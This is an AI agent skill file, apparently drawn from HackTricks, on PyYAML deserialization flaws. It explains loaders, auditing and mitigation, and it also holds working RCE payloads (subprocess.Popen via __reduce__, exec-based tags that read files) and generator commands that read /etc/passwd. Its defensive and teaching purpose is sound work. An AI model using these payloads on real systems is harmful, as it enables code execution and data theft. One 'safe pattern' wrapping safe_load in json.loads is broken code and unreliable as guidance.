Hacktricks-skills python-yaml-deserialization

Security skill for understanding, testing, and mitigating Python YAML deserialization vulnerabilities. Use this skill whenever the user mentions YAML deserialization, PyYAML security, Python RCE through YAML, deserialization attacks, or needs to audit code for unsafe yaml.load() usage. Also trigger for requests about safe YAML loading practices, payload generation for authorized security testing, or explaining how !!python/object tags work.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/deserialization/python-yaml-deserialization/SKILL.MD

source content

Python YAML Deserialization Security

This skill helps you understand, test, and mitigate YAML deserialization vulnerabilities in Python applications. Use this for authorized security testing only.

Understanding the Vulnerability

PyYAML can deserialize Python objects, not just raw data. This becomes dangerous when untrusted input is deserialized with unsafe loaders.

How Serialization Works

import yaml

# Raw data - safe
print(yaml.dump(str("lol")))
# Output: lol

# Python objects - DANGEROUS
print(yaml.dump(tuple("lol")))
# Output:
# !!python/tuple
# - l
# - o
# - l

print(yaml.dump(range(1,10)))
# Output:
# !!python/object/apply:builtins.range
# - 1
# - 10
# - 1

The

!!python/

tags indicate Python object serialization, which can execute arbitrary code when deserialized.

Safe vs Unsafe Loaders

Function	Loader	Safe?	Notes
`safe_load()`	SafeLoader	✅ Yes	Only basic types
`safe_load_all()`	SafeLoader	✅ Yes	Only basic types
`load()` (no Loader)	SafeLoader (PyYAML ≥5.1)	✅ Yes	Default changed in 5.1
`load(Loader=Loader)`	Loader	❌ No	Deserializes objects
`load(Loader=UnsafeLoader)`	UnsafeLoader	❌ No	Deserializes objects
`load(Loader=FullLoader)`	FullLoader	❌ No	Deserializes objects
`unsafe_load()`	UnsafeLoader	❌ No	Deserializes objects
`full_load()`	FullLoader	❌ No	Deserializes objects

Key insight: In PyYAML ≥5.1,

yaml.load()

without a Loader defaults to SafeLoader. But explicitly specifying

Loader

UnsafeLoader

, or

FullLoader

enables object deserialization.

Basic Exploits

Simple Command Execution

import yaml
from yaml import UnsafeLoader

# Execute sleep command
data = b'!!python/object/apply:time.sleep [2]'
yaml.load(data, Loader=UnsafeLoader)  # Sleeps for 2 seconds

RCE via Custom Payload

import yaml
import subprocess

class Payload:
    def __reduce__(self):
        return (subprocess.Popen, ('ls',))

# Serialize the payload
serialized = yaml.dump(Payload())
print(serialized)
# Output:
# !!python/object/apply:subprocess.Popen
# - ls

# Deserialize (executes the command)
yaml.load(serialized, Loader=UnsafeLoader)

Legacy Exploit (Old PyYAML Versions)

For PyYAML <5.1 where

yaml.load()

without Loader was vulnerable:

!!python/object/new:str
state: !!python/tuple
  - 'print(getattr(open("flag.txt"), "read")())'
  - !!python/object/new:Warning
    state:
      update: !!python/name:exec

Or the one-liner variant:

!!python/object/new:str {
  state:
    !!python/tuple [
      'print(exec("print(open(\"flag.txt\",\"r\").read())"))',
      !!python/object/new:Warning { state: { update: !!python/name:exec } },
    ],
}

Generating Payloads

Use the

generate_yaml_payload.py

script (bundled with this skill) to create test payloads:

python scripts/generate_yaml_payload.py --command "cat /etc/passwd" --output payload.yaml

Or use the external tool python-deserialization-attack-payload-generator:

python3 peas.py
# Enter RCE command: cat /root/flag.txt
# Enter OS: linux
# Select Module: PyYAML
# Done! Check /tmp/example_yaml

Auditing Code for Vulnerabilities

Vulnerable Patterns

# ❌ VULNERABLE - explicit unsafe loader
yaml.load(data, Loader=UnsafeLoader)
yaml.load(data, Loader=Loader)
yaml.load(data, Loader=FullLoader)

# ❌ VULNERABLE - unsafe functions
yaml.unsafe_load(data)
yaml.full_load(data)

# ❌ VULNERABLE - old PyYAML (<5.1) without Loader
yaml.load(data)  # Only vulnerable in old versions

Safe Patterns

# ✅ SAFE - use safe_load
yaml.safe_load(data)
yaml.safe_load_all(data)

# ✅ SAFE - PyYAML ≥5.1 without Loader (defaults to SafeLoader)
yaml.load(data)  # Only if you control the PyYAML version

# ✅ SAFE - parse as string first, then validate
import json
data = json.loads(yaml.safe_load(raw_input))

Quick Audit Checklist

Search for
```
yaml.load(
```
in codebase
Check if Loader parameter is specified
If Loader is
```
UnsafeLoader
```
,
```
Loader
```
, or
```
FullLoader
```
→ VULNERABLE
If using
```
unsafe_load()
```
or
```
full_load()
```
→ VULNERABLE
Check PyYAML version - <5.1 without Loader is vulnerable
Verify all YAML input is from trusted sources

Mitigation Strategies

1. Always Use safe_load()

# Replace all unsafe loading with safe_load
data = yaml.safe_load(file_content)

2. Validate Input Source

# Only deserialize YAML from trusted sources
if source == "internal_config":
    data = yaml.load(content, Loader=Loader)  # OK for trusted data
else:
    data = yaml.safe_load(content)  # Required for untrusted data

3. Use Alternative Formats

Consider JSON for data interchange - it doesn't support object deserialization:

import json

# JSON is inherently safe from deserialization attacks
data = json.loads(json_string)

4. Pin PyYAML Version

# pyproject.toml
[dependencies]
pyyaml = ">=5.1"  # Ensures safe default behavior

Testing Your Application

1. Check for Vulnerable Loaders

grep -r "yaml.load" --include="*.py" .
grep -r "UnsafeLoader" --include="*.py" .
grep -r "FullLoader" --include="*.py" .

2. Test with Payload

# test_yaml_vuln.py
import yaml
from yaml import UnsafeLoader

test_payload = b'!!python/object/apply:time.sleep [1]'

try:
    yaml.load(test_payload, Loader=UnsafeLoader)
    print("VULNERABLE: Object deserialization enabled")
except Exception as e:
    print(f"Safe: {e}")

3. Verify safe_load Works

import yaml

# This should work
safe_data = yaml.safe_load("name: test\nvalue: 123")
print(safe_data)  # {'name': 'test', 'value': 123}

# This should fail
try:
    yaml.safe_load("!!python/object/apply:time.sleep [1]")
except Exception as e:
    print(f"Correctly blocked: {e}")

References

When to Use This Skill

Use this skill when you need to:

Audit Python code for YAML deserialization vulnerabilities
Generate test payloads for authorized security testing
Understand how !!python/object tags work
Learn safe YAML loading practices
Explain deserialization attacks to stakeholders
Convert vulnerable yaml.load() calls to safe alternatives
Test applications for RCE via YAML